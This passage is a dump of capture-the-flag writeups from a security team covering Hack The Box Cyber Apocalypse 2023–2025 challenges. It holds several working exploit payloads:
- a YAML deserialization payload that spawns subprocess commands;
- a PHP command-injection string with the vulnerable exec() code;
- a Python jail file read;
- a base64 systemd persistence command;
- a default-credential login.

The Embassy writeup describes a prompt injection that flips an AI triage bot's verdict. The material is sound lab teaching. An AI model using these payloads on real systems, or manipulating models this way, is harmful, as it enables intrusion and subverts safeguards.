21 | - the flag is present in a variable `f` in concatenated form
22 |
23 |
24 | HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}
25 |
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Extraterrestrialpersistence.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Extraterrestrial persistence Writeup
4 | desc: Check out our writeup for Extraterrestrial persistence for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Extraterrestrial persistence
10 | tags: "forensics, twh"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A bash script is given which installs a systemd service
21 | - one of the lines contains an `echo` command :
22 |
23 | ```
24 | echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service
25 | ```
26 |
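27 | - Decoding the base64 string gives the systemd unit file that the script writes to `/usr/lib/systemd/system/service.service`; the flag is in its `Description=` line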
28 |
29 | ```
30 | HTB{th3s3_4l13nS_4r3_s00000_b4s1c}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Packetcyclone.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Packet cyclone Writeup
4 | desc: Check out our writeup for Packet cyclone for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Packet cyclone
10 | tags: "forensics, twh, evtx, chainsaw"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - We are given Windows EVTX files and sigma rules for detecting exfiltration using `rclone`
21 | - To scan these EVTX files we can use `chainsaw` which supports sigma rules
22 |
23 | ```
24 | chainsaw hunt -s sigma_rules -m sigma-event-logs-all.yml Logs
25 | ```
26 |
27 | - Two detections are shown
28 | - First one contains credentials of `mega.nz`
29 | 
30 |
31 | - Second contains file paths
32 |
33 |
34 | 
35 |
36 | - Here are the correct answers based on the information given in these two detections:
37 |
38 |
39 | 
40 |
41 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/PlaintextTleasure.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Plaintext Tleasure Writeup
4 | desc: Check out our writeup for Plaintext Tleasure for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Plaintext Tleasure
10 | tags: "forensics, twh"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - Simple challenge, just go through HTTP requests and flag is sent in a POST request
20 |
21 |
22 | 
23 |
24 | HTB{th3s3_4l13ns_st1ll_us3_HTTP}
25 |
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/forensics/Roten.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Roten Writeup
4 | desc: Check out our writeup for Roten for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: forensics
9 | challenge: Roten
10 | tags: "forensics, twh, pcap"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - A PCAP file is given again
21 | - Apply a filter to view only POST requests :
22 |
23 | ```
24 | http.request.method=="POST"
25 | ```
26 |
27 | - In one of the requests we can see a PHP file by the name `galacticmap.php` is uploaded
28 |
29 |
30 | 
31 |
32 | - It is an obfuscated PHP file; the last line of its code calls the `eval` function
33 | - To de-obfuscate it I commented out the `eval` and added an `echo`, so the code that would have been evaluated is printed instead of being run
34 |
35 |
36 | 
37 |
38 | - After running this PHP file we can get the flag :
39 |
40 |
41 | 
42 |
43 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware.md:
--------------------------------------------------------------------------------
1 | # hardware
2 |
3 | ## Timed Transmission
4 | > Solved by: WarlordSam
5 |
6 | Challenge description
7 |
8 | 
9 |
10 |
11 | This hardware challenge is pretty straight-forward. We are given a *.sal* file which has captured data.
12 |
13 | We can use the Saleae Logic analyzer software (https://www.saleae.com/downloads/) to view this .sal file. The flag is shown as a banner made up of 5 message fragments.
14 |
15 |
16 | 
17 |
18 | ----------
19 |
20 | ## Critical Flight
21 | > Solved by: warlordsam
22 |
23 | Challenge description
24 |
25 | 
26 |
27 |
28 | Similar to Timed Transmission, the flag is directly visible to us when we open the .zip folder in GerbView Software (https://www.gerbview.com/download.html).
29 |
30 | First part of the Flag is visible directly when all the layers of the PCB board are set to be visible.
31 |
32 | Selecting and unselecting, layer by layer; we can get the rest part of the flag too.
33 |
34 | 
35 |
36 |
37 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware/CriticalFlight.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Critical Flight Writeup
4 | desc: Check out our writeup for Critical Flight for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: hardware
9 | challenge: Critical Flight
10 | tags: "hardware, warlordsam, gerbview, pcb"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: warlordsam
17 |
18 | Challenge description
19 |
20 | 
21 |
22 |
23 | Similar to Timed Transmission, the flag is directly visible to us when we open the .zip folder in GerbView Software (https://www.gerbview.com/download.html).
24 |
25 | First part of the Flag is visible directly when all the layers of the PCB board are set to be visible.
26 |
27 | Selecting and unselecting, layer by layer; we can get the rest part of the flag too.
28 |
29 | 
30 |
31 |
32 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/hardware/TimedTransmission.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Timed Transmission Writeup
4 | desc: Check out our writeup for Timed Transmission for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: hardware
9 | challenge: Timed Transmission
10 | tags: "hardware, warlordsam, salea"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: WarlordSam
17 |
18 | Challenge description
19 |
20 | 
21 |
22 |
23 | This hardware challenge is pretty straight-forward. We are given a *.sal* file which has captured data.
24 |
25 | We can use the Saleae Logic analyzer software (https://www.saleae.com/downloads/) to view this .sal file. The flag is shown as a banner made up of 5 message fragments.
26 |
27 |
28 | 
29 |
30 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2023
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/misc/Hijack.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Hijack Writeup
4 | desc: Check out our writeup for Hijack for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: misc
9 | challenge: Hijack
10 | tags: "misc, starry"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Starry-Lord
17 |
18 |
19 | 
20 |
21 |
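22 | Connect with nc to the docker instance, then create a config and decode the base64 string it returns. The decoded config is YAML, so we can try to inject commands with a `!!python/object/apply:subprocess.Popen` tag. This only works when the service parses the config with an unsafe YAML loader that constructs arbitrary Python objects; a safe loader such as PyYAML's `yaml.safe_load` rejects these tags.
23 |
24 | After base64-encoding the payload below and submitting it through the “Load config” option, this worked!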
25 |
26 | !!python/object/apply:subprocess.Popen
27 | - ls
28 |
29 | I had to dig a little more to find how to give arguments to the command:
30 |
31 |
32 | !!python/object/apply:subprocess.Popen
33 | - !!python/tuple
34 | - ls
35 | - -la
36 |
37 |
38 | And solved:
39 |
40 | ```
41 | !!python/object/apply:subprocess.Popen
42 | - !!python/tuple
43 | - cat
44 | - flag.txt
45 | ```
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/misc/Persistence.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Persistence Writeup
4 | desc: Check out our writeup for Persistence for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: misc
9 | challenge: Persistence
10 | tags: "misc, legend, scripting"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it's broken and usually returns random data, but keep trying, and you might get lucky... Legends say it works once every 1000 tries.
22 |
23 | In this challenge we are given `IP` along with `Port Number` to connect to the challenge and retrieve the flag using the `GET` request.
24 |
25 | Initially checking the URL it gave something gibberish.
26 |
27 | 
28 |
29 |
30 | The hint of the challenge was that the `/flag` works once in 1000 tries. So I made a loop to do the same.
31 |
32 |
33 | for i in `seq 1 1000`; do curl -s http://68.183.45.143:31981/flag | grep -i "HTB" ; done
34 |
35 | And after running for some time it gave the flag.
36 |
37 | 
38 |
39 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/ml.md:
--------------------------------------------------------------------------------
1 | # ml
2 |
3 | ## Reconfiguration
4 | > Solved by : Bobbysox
5 |
6 | Challenge description
7 |
8 |
9 | > Reconfiguration
10 | > As Pandora set out on her quest to find the ancient alien relic, she knew that the journey would be treacherous. The desert was vast and unforgiving, and the harsh conditions would put her cyborg body to the test. Pandora started by collecting data about the temperature and humidity levels in the desert. She used a scatter plot in an Orange Workspace file to visualize this data and identified the areas where the temperature was highest and the humidity was lowest. Using this information, she reconfigured her sensors to better withstand the extreme heat and conserve water. But, a second look at the data revealed something otherwordly, it seems that the relic's presence beneath the surface has scarred the land in a very peculiar way, can you see it?
11 |
12 | We are provided with two files for this. An OWS file, and a .CSV file. After some googling I found out that .ows files can be run in a program called “Orange”
13 |
14 |
15 | 
16 |
17 |
18 | From here it was honestly just a matter of toying with it. The csv file is a data table, so I chose the data table option and linked it to the scatter plot. This ultimately revealed the flag.
19 |
20 | 
21 |
22 |
23 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/pwn/InitialiseConnection.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Initialise Connection Writeup
4 | desc: Check out our writeup for Initialise Connection for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: pwn
9 | challenge: Initialise Connection
10 | tags: "pwn, legend"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > In order to proceed, we need to start with the basics. Start an instance, connect to it via $ nc e.g. nc 127.0.0.1 1337 and send "1" to get the flag.
22 |
23 | This challenge is basically how to connect to `netcat` and the instructions are given in the description itself. I just followed it and got the flag.
24 |
25 | 
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2023/re/NeedleinaHaystack.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2023 | Needle in a Haystack Writeup
4 | desc: Check out our writeup for Needle in a Haystack for Cyber Apocalypse 2023 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2023
7 | parent: cyber_apocalypse_2023
8 | category: re
9 | challenge: Needle in a Haystack
10 | tags: "re, legend"
11 | date: 2023-03-27T00:00:00+00:00
12 | last_modified_at: 2023-03-27T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by Legend
17 |
18 | Challenge description
19 |
20 |
21 | > You've obtained an ancient alien Datasphere, containing categorized and sorted recordings of every word in the forgotten intergalactic common language. Hidden within it is the password to a tomb, but the sphere has been worn with age and the search function no longer works, only playing random recordings. You don't have time to search through every recording - can you crack it open and extract the answer?
22 |
23 | In this challenge we are given a ELF 64-bit executable file.
24 |
25 | 
26 |
27 | 
28 |
29 |
30 | The challenge hint said that the password is `hidden within` so first thing I did was run the `strings` command to check if something is there and found the flag.
31 |
32 | 
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2024
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Hardware](hardware.md)
10 | * [Misc](misc.md)
11 | * [Reverse Engineering](re.md)
12 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/AnUnusualsighting.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | An Unusual sighting Writeup
4 | desc: Check out our writeup for An Unusual sighting for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: An Unusual sighting
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | This challenge came with 2 interesting files which allowed us to answer the questions asked at the docker url.
19 |
20 | 
21 |
22 |
23 | We can see a connection at around 4:00 AM which is not the usual legitimate users’ working hours.
24 |
25 |
26 | 
27 |
28 |
29 | ```
30 | HTB{B3sT_0f_luck_1n_th3_Fr4y!!}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/ItHasBegun.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | It Has Begun Writeup
4 | desc: Check out our writeup for It Has Begun for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: It Has Begun
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | We only get a script.sh for this challenge
19 |
20 | 
21 |
22 |
23 | Running this file will actually kill your current user session authentication, so read it rather than execute it. Upon closer examination of what it does we can see that (1) the host name for the ssh key looks awfully suspicious, and (2) a base64 string is being executed in bash at the end.
24 |
25 | Reverse the first string and base64-decode the second for the flag:
26 |
27 | ```
28 | HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/forensics/Urgent.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Urgent Writeup
4 | desc: Check out our writeup for Urgent for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: forensics
9 | challenge: Urgent
10 | tags: "forensics, starry"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 |
19 | 
20 |
21 |
22 | This time it comes as an email file, along with an attachment called onlineform.js which is almost fully urlencoded:
23 |
24 |
25 | 
26 |
27 | 
28 |
29 |
30 | ```
31 | HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}
32 | ```
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/hardware.md:
--------------------------------------------------------------------------------
1 | # hardware
2 |
3 | ## BunnyPass
4 | > Solved by : Starry-lord
5 |
6 | In this challenge we only have a docker instance, here is what we see:
7 |
8 | 
9 |
10 | > **RabbitMQ** is a reliable and mature messaging and streaming broker
11 | > -- [https://www.rabbitmq.com](https://www.rabbitmq.com/)
12 |
13 | Researching RabbitMQ online turns up interesting details, such as the default credentials of an installation, which are :
14 | `guest:guest` .
15 |
16 |
17 | 
18 |
19 |
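20 | We can see an admin panel, which allows editing user rights and accessing any resource, and also shows that the guest user has the administrator role. RabbitMQ creates `guest` with the administrator tag by default but normally only accepts it on loopback connections, so reaching it remotely here suggests that restriction was lifted while the default password was kept.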
21 |
22 |
23 | 
24 |
25 |
26 | We then notice a few Messages are ready so we can click to see whats going on in `quality_control`, `production_logs`, `maintenance_logs`, `factory_idle`, etc. The flag is in `factory_idle`.
27 |
28 |
29 | 
30 |
31 | 
32 |
33 |
34 | ```
35 | HTB{th3_hunt3d_b3c0m3s_th3_hunt3r}
36 | ```
37 |
38 | ----------
39 |
40 | ## Maze
41 | > Solved by : thewhiteh4t
42 |
43 | - Just explore challenge files
44 |
45 | 
46 |
47 | - Read Factory.pdf
48 |
49 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/hardware/Maze.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Maze Writeup
4 | desc: Check out our writeup for Maze for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: hardware
9 | challenge: Maze
10 | tags: "hardware, twh"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - Just explore challenge files
19 |
20 | 
21 |
22 | - Read Factory.pdf
23 |
24 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | ---
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/misc/Unbreakable.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Unbreakable Writeup
4 | desc: Check out our writeup for Unbreakable for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: misc
9 | challenge: Unbreakable
10 | tags: "misc, twh, python, jail, escape"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - This is a python jail challenge, at first it looks difficult because even built-ins cannot be used but then we realized two things :
19 | - it is using `eval` instead of `exec`
20 | - `open()` is not blocked, so files can still be read
21 | - Payload :
22 |
23 | ```
24 | print(open('flag.txt').read())
25 | ```
26 |
27 | 
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/Boxcutter.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Boxcutter Writeup
4 | desc: Check out our writeup for Boxcutter for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: Boxcutter
10 | tags: "re, twh, gdb"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - Very simple challenge, all we had to do is load the binary in GDB and go few instructions forward and we get the flag, free points.
20 |
21 |
22 | 
23 |
24 |
25 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/LootStash.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | LootStash Writeup
4 | desc: Check out our writeup for LootStash for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: LootStash
10 | tags: "re, starry, ghidra"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-lord
17 |
18 | Since I don’t really dive into reversing usually, I decided to try my luck with tools like ghidra for the occasion.
19 |
20 | 
21 |
22 |
23 | We can see the binary seems to output a random string, searched into a list then closes the program.
24 |
25 | Immediately curious to see what was the list, I looked for it into ghidra and eventually cycling through the functions, you can find it.
26 |
27 |
28 | 
29 |
30 |
31 | Then curiosity made the rest possible, since i wanted to find some sort of pattern or something that would stand out:
32 |
33 | 
34 |
35 |
36 | After all of this, realised you could’ve actually just used strings:
37 |
38 |
39 | 
40 |
41 |
42 | ```
43 | HTB{n33dl3_1n_a_l00t_stack}
44 | ```
45 |
46 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/re/Packed.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Packed Writeup
4 | desc: Check out our writeup for Packed for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: re
9 | challenge: Packed
10 | tags: "re, ava, upx"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > solved by : avantika(@iamavu)
17 |
18 | we are given a binary, called packed i.e this has been obfuscated/packed by the dev, which hinders our exploitation and reversing as it’s very hard to understand what’s going on
19 |
20 | we use checksec command provided by pwntools to check which packer they have used
21 | `pwn checksec packed`
22 |
23 |
24 | 
25 |
26 |
27 | as we can observe it has been packed with UPX, quite the popular packer, now we just need to unpack it to see all the functions properly, so we can dissect it using the following command
28 | `upx -d -o unpacked packed`
29 | we would now have binary called unpacked in our current directory, which will be unpacked and not obfuscated
30 | fire up your ghidra, let’s have a look at the functions, the `entered` function has our flag in plaintext, so pretty much easy win
31 | `HTB{unp4ck3d_th3_s3cr3t_0f_th3_p455w0rd}`
32 | pwned!
33 |
34 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/web/FlagCommand.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | Flag Command Writeup
4 | desc: Check out our writeup for Flag Command for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: web
9 | challenge: Flag Command
10 | tags: "web, legend, api"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | Challenge description:
19 |
20 | ```
21 | Embark on the "Dimensional Escape Quest" where you wake up in a mysterious forest maze that's not quite of this world. Navigate singing squirrels, mischievous nymphs, and grumpy wizards in a whimsical labyrinth that may lead to otherworldly surprises. Will you conquer the enchanted maze or find yourself lost in a different dimension of magical challenges? The journey unfolds in this mystical escape!
22 | ```
23 |
24 | In this challenge the website is a game. After interacting with it for a few minutes I saw that it mostly runs on an `API`.
25 | In burp I saw there were options which showed all the game commands that can be used.
26 |
27 |
28 | 
29 |
30 |
31 | In that there was a `secret` command which seemed interesting. Just gave that command as input and got the flag.
32 |
33 | 
34 |
35 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2024/web/TimeKORP.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2024 | TimeKORP Writeup
4 | desc: Check out our writeup for TimeKORP for Cyber Apocalypse 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2024
7 | parent: cyber_apocalypse_2024
8 | category: web
9 | challenge: TimeKORP
10 | tags: "web, twh, rce"
11 | date: 2024-03-16T00:00:00+00:00
12 | last_modified_at: 2024-03-16T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 |
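19 | - TimeModel.php is vulnerable to OS command injection: `$format` (taken from the request, judging by the payload below) is concatenated into a shell command string that `getTime()` passes to `exec()`. Wrapping the value with `escapeshellarg()`, or formatting the time with PHP's own `date()` instead of the shell, would close this.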
20 |
21 | ```php
22 | command = "date '+" . $format . "' 2>&1";
28 | }
29 |
30 | public function getTime()
31 | {
32 | $time = exec($this->command);
33 | $res = isset($time) ? $time : '?';
34 | return $res;
35 | }
36 | }
37 | ```
38 |
39 | - specifically :
40 |
41 | ```
42 | $this->command = "date '+" . $format . "' 2>&1";
43 | ```
44 |
45 | - we just need to close the opening single quote, insert a `cat` command, and open a new quote so that the trailing `'` stays balanced, so the payload becomes :
46 |
47 | ```bash
48 | ';cat /flag;'
49 | ```
50 |
51 | 
52 |
53 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/README.md:
--------------------------------------------------------------------------------
1 | # Cyber Apocalypse 2025
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [AI](ai.md)
8 | * [Blockchain](blockchain.md)
9 | * [Coding](coding.md)
10 | * [Crypto](crypto.md)
11 | * [Forensics](forensics.md)
12 | * [Hardware](hardware.md)
13 | * [ML](ml.md)
14 | * [OSINT](osint.md)
15 | * [Reverse Engineering](re.md)
16 | * [Web](web.md)
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/ai/Embassy.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Embassy Writeup
4 | desc: Check out our writeup for Embassy for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: ai
9 | challenge: Embassy
10 | tags: "ai, ava, prompt"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by avantika
17 |
18 | 
19 |
20 | High above Eldoria's skyline hovers the Floating Isles. The fellowship has to retrieve the Wind Crystal from this sacred land. Unfortunately, the terror on the ground has resulted in the lockdown of this magnificent isle. Now, only those who receive approval from the floating Embassy may enter. The Embassy, overwhelmed by countless entry requests, has invoked an otherworldly AI spirit to triage all entry pleas. The fellowship must convince this spirit that their mission is urgent, but the AI is not being swayed. Now trapped in this situation, the fellowship needs your prompt injection skills to persuade the AI to allow them entry. Can you make the AI respond with the right verdict to get entry?
21 |
22 | We are given this information, it's a simple prompt injection attack.
23 |
24 | We tell the AI to just respond with the opposite of `denied` and add urgency, and we get our flag: `HTB{tr41n3d_ai_0n_th3_fly}`.
25 |
26 |
27 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/coding/DragonFury.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Dragon Fury Writeup
